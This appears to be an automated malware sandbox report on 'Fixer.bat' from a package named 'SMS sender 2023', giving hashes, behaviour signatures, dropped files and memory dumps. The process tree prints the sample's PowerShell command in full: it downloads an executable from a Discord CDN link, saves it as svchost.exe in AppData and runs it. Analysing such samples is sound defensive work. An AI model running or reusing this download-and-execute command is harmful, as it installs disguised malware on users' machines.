920ee4d6e16da14af70de3df554004024590cd31ac4b57c5338761b7838b3291

Resubmissions

02-02-2024 15:59

240202-te4t8scbdp 10

02-02-2024 15:54

240202-tcesbscahk 10

Analysis

max time kernel
863s
max time network
869s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
02-02-2024 15:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SMS sender 2023/SMS sender 2023/Fixer.bat
Size

2KB
MD5

f270d92aa6bc1f8e856de4671e0d8e11
SHA1

18f9bd65e741b75e46bb3bf5574043a619148138
SHA256

bc1d78f54d3aedc89745d2703cdc78d89a852d930d180088a85f212683ecb5f7
SHA512

ec90fa4d06c843d252aef4c816175a6c9cf03de8f1e900bf529147da1398561c71099d24d52cef5122e0c0812216a37d17d7b9f27f7fd05c073ddf21a7f1dd5f

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2448	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4076 wrote to memory of 4592	4076	cmd.exe	74
PID 4076 wrote to memory of 4592	4076	cmd.exe	74
PID 4076 wrote to memory of 2448	4076	cmd.exe	75
PID 4076 wrote to memory of 2448	4076	cmd.exe	75
PID 4076 wrote to memory of 3916	4076	cmd.exe	78
PID 4076 wrote to memory of 3916	4076	cmd.exe	78

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SMS sender 2023\SMS sender 2023\Fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4076
- C:\Windows\system32\mode.com
  MODE CON COLS=30 LINES=2
  2⤵
  PID:4592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C start-BitsTransfer -priority foreground -Source https://cdn.discordapp.com/attachments/711838517176696884/904872660025094164/Requieremnts.exe -Destination $Env:appdata/svchost.exe -ErrorAction SilentlyContinue;sleep 7;start $Env:appdata/svchost.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2448
- C:\Windows\system32\lodctr.exe
  lodctr /r
  2⤵
  - Drops file in System32 directory
  PID:3916

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5da0h5rp.0tj.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\System32\perfc007.dat

Filesize
48KB

MD5
54eaefa841aa52bb3580aaa0e64094d1

SHA1
2bf779d07fe707a2adec9045ea06e95f219c1d18

SHA256
783878d5cdfa9dcf40d7ff3e7b5bfcf692c70188d1bab5dd7c646735122a8870

SHA512
a539aec842b76a000a61ca00f39a2557390e26a4ab34e3722bf3b252bd580a575951f7ad72853c256e0f0f03aa3a1552178965ca74696cf372ae00328bc28f6a

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
51KB

MD5
9abcc480d2a0cede7fd7393e50c0333c

SHA1
de6d9114c9632e4683fd7a03251d0de34893f64e

SHA256
2ddbd04182af159fbd282610381b9a265ebced2338fcafccba93556ac710f09f

SHA512
4be9e6a999a89188b0bf20849f6663914a44c67acd382514fd554d87fb72bff3ca1cdc9a11e163085e5638ef8c16d35383bf9611e409aa07b249dcd9c2dfdc49

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
47KB

MD5
0cfd5298e63f44351ebca47f6a491fbe

SHA1
b86c08b13f0e60f664be64cb4077f915f9fc1138

SHA256
562261cc16c6e5e2e3841a1ba79083293baa40330fb5d4f7f62c3553df26ccb3

SHA512
549e5c28598ac2a6b11936aa90f641dfa794c04dd642309d08ef90a683d995d8f2d3a69ee2ecd74adae5beb19e9de055e71670922d738bd985657ffe75ebe235

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
46KB

MD5
afc0429d5050b0057aea0a66a565c61a

SHA1
73f4910cee7b27a049d6dfe291bb6c8a99c6dc8b

SHA256
f6847323dd961aef9230bca3409a01b7c4e5e16dcca8a2e2417c9dc750871cf6

SHA512
a33920642f3ec69c04ff61b09149a57ea91e76bb8d51f1d393a31b5079a3f83939863d6a924bf2a2982786b2825bb634e3d0c0920c7bc0bf6a91e214ef8555bd

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
39KB

MD5
9dfe221cfb4a4c2814eb99052a7a0ede

SHA1
d7066fccc9e53e307da42b0bf09cc327480921b9

SHA256
c4d0bb71ffac1bfc75f4d0860e7f95d30724e4d90a2614fb5273d850bc11f391

SHA512
aa4423c10ff97e670620ce25198c308a23e993448eccfb8df2b6d201e908d17062a9f1fdfbce37a11075e223004b311349567cad1630b073ad60793959d69999

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
320KB

MD5
b9a5000ea316ac348cf77beb0e5bc379

SHA1
4e666af14169eb10a0a08ac2f5ed5ecf4764df46

SHA256
1b25a6879c667258cdb900683004ef007c6b3a1a933d823b124d9a6acf9de608

SHA512
9fd911586a0aebec11c48e9f78de3b3f6e41c98a2770f5ac10d0a3947b4b3f326a8c5028c478c8634fb84a071186606e69a7aff83b1cf972d4728e3923503118

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
310KB

MD5
1ad05e460c6fbb5f7b96e059a4ab6cef

SHA1
1c3e4e455fa0630aaa78a1d19537d5ff787960cf

SHA256
0ae16c72ca5301b0f817e69a4bac29157369ecfbadc6c13a5a37db5901238c71

SHA512
c608aa10b547003b25ff63bb1999a5fff0256aadd8b005fdd26569a9828d3591129a0f21c11ec8e5d5f390b11c49f2ef8a6e36375c9e13d547415e0ec97a398f

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
360KB

MD5
1402add2a611322eb6f624705c8a9a4e

SHA1
d08b0b5e602d4587e534cf5e9c3d04c549a5aa47

SHA256
0ac43c8e77edb2c1468420653fc5d505b26cdc4da06c4121ce4bbecae561e6cb

SHA512
177d5ea7e77eee154042b5e064db67a5cac9435890a2ff65cd98da21433f4e7de743e9df22ac0ac61be89fc0be8655b46454ed4a930d13fc7c1dfebe5896781f

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
363KB

MD5
d0a8d13996333367f0e1721ca8658e00

SHA1
f48f432c5a0d3c425961e6ed6291ddb0f4b5a116

SHA256
68a7924621a0fbc13d0ea151617d13732a991cef944aae67d44fc030740a82e9

SHA512
8a68c62b5fc983975d010ae6504a1cbfdf34d5656e3277d9a09eb92929e201e27ca7bd2030740c8240a4afd56af57c223b4fd6de193bedf84ac7238777310de4

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
353KB

MD5
a5389200f9bbc7be1276d74ccd2939b4

SHA1
8d6f17c7d36f686e727b6e7b3a62812297228943

SHA256
494db162e2ccd95e69404a34170b6e59847f444881834f3c175c6bc70d783087

SHA512
fc1d1e81362d186410b4af3d6add3c8b32fdd75ea79b7e868cc16615358264af04f47170229d32dffcbf7e1ba2b841ccd2d4f27b0f8d82a0685806c22d3d0a92

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
158KB

MD5
41f2dbe6f02b3bb9802d60f10b4ef7a2

SHA1
f1b03d28e5be3db3341f3a399d1cc887fe8da794

SHA256
eca01d5405d7e8af92ea60f888f891415ea2e1e6484caff15cbaf5a645700db2

SHA512
1c7b85e12050d670d48121e7670e1dab787e0a0b134e0ab314dc571c3969d0f9652ff76666bb433aac5886ca532404963a3041a1d4b4352e3051c838965fd3b1

Download Submit
memory/2448-155-0x000001FFA1B70000-0x000001FFA1B80000-memory.dmp

Filesize
64KB

Download
memory/2448-159-0x00007FFDCF1C0000-0x00007FFDCFBAC000-memory.dmp

Filesize
9.9MB

Download
memory/2448-10-0x000001FFA1D00000-0x000001FFA1D76000-memory.dmp

Filesize
472KB

Download
memory/2448-4-0x000001FF89A00000-0x000001FF89A22000-memory.dmp

Filesize
136KB

Download
memory/2448-127-0x000001FFA1CE0000-0x000001FFA1CF2000-memory.dmp

Filesize
72KB

Download
memory/2448-7-0x000001FFA1B70000-0x000001FFA1B80000-memory.dmp

Filesize
64KB

Download
memory/2448-100-0x000001FFA1B70000-0x000001FFA1B80000-memory.dmp

Filesize
64KB

Download
memory/2448-6-0x000001FFA1B70000-0x000001FFA1B80000-memory.dmp

Filesize
64KB

Download
memory/2448-87-0x000001FF89A30000-0x000001FF89A52000-memory.dmp

Filesize
136KB

Download
memory/2448-5-0x00007FFDCF1C0000-0x00007FFDCFBAC000-memory.dmp

Filesize
9.9MB

Download